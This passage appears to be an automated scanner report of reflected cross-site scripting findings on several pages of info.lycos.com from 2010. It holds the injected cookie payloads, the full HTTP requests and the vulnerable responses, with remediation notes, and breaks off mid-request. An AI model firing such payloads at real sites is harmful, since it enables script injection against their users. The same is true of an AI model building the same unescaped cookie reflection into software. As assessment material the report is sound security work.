Content-Length: 18619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Abus ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/copyright.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad10bb"><script>alert(1)</script>e5827dbe638.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5251b"><script>alert(1)</script>887c4447e55 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /jobs.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5251b"><script>alert(1)</script>887c4447e55; displayMobile=0; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15488
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Curr ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/jobs.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5251b"><script>alert(1)</script>887c4447e55.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d910"%3balert(1)//820c5e59da9 was submitted in the diktfc cookie. This input was echoed as 7d910";alert(1)//820c5e59da9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jobs.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7d910"%3balert(1)//820c5e59da9; displayMobile=0; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15458
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Curr ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/jobs.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7d910";alert(1)//820c5e59da9.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1655e"><script>alert(1)</script>bf11cff77f9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /legal/legal.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1655e"><script>alert(1)</script>bf11cff77f9; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1655e"><script>alert(1)</script>bf11cff77f9.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb6"%3balert(1)//37ed0722e88 was submitted in the diktfc cookie. This input was echoed as 4eeb6";alert(1)//37ed0722e88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legal/legal.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4eeb6"%3balert(1)//37ed0722e88; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4eeb6";alert(1)//37ed0722e88.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9447b"%3balert(1)//68c9f298253 was submitted in the diktfc cookie. This input was echoed as 9447b";alert(1)//68c9f298253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legal/sectoolbar.html HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9447b"%3balert(1)//68c9f298253; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:35 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9447b";alert(1)//68c9f298253.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99a57"><script>alert(1)</script>cc300b5c45e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /legal/sectoolbar.html HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A99a57"><script>alert(1)</script>cc300b5c45e; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A99a57"><script>alert(1)</script>cc300b5c45e.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 971b4"%3balert(1)//81f487453e8 was submitted in the diktfc cookie. This input was echoed as 971b4";alert(1)//81f487453e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /life.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A971b4"%3balert(1)//81f487453e8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16096
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Life ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/life.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A971b4";alert(1)//81f487453e8.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35baa"><script>alert(1)</script>9cc8ee2a812 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /life.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35baa"><script>alert(1)</script>9cc8ee2a812; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Life ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/life.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35baa"><script>alert(1)</script>9cc8ee2a812.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe78f"%3balert(1)//0ed3ac7046c was submitted in the diktfc cookie. This input was echoed as fe78f";alert(1)//0ed3ac7046c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /overview.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe78f"%3balert(1)//0ed3ac7046c; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16597
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Comp ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/overview.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe78f";alert(1)//0ed3ac7046c.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4900"><script>alert(1)</script>bf225484b1b was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /overview.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad4900"><script>alert(1)</script>bf225484b1b; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Comp ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/overview.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad4900"><script>alert(1)</script>bf225484b1b.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1672b"><script>alert(1)</script>2b55e5b0452 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1672b"><script>alert(1)</script>2b55e5b0452; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/privacy.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1672b"><script>alert(1)</script>2b55e5b0452.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ad88"%3balert(1)//e21d1919c06 was submitted in the diktfc cookie. This input was echoed as 8ad88";alert(1)//e21d1919c06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ad88"%3balert(1)//e21d1919c06; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54341
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/privacy.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ad88";alert(1)//e21d1919c06.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 190dd"%3balert(1)//7b5dcd82c26 was submitted in the diktfc cookie. This input was echoed as 190dd";alert(1)//7b5dcd82c26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/privacy.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
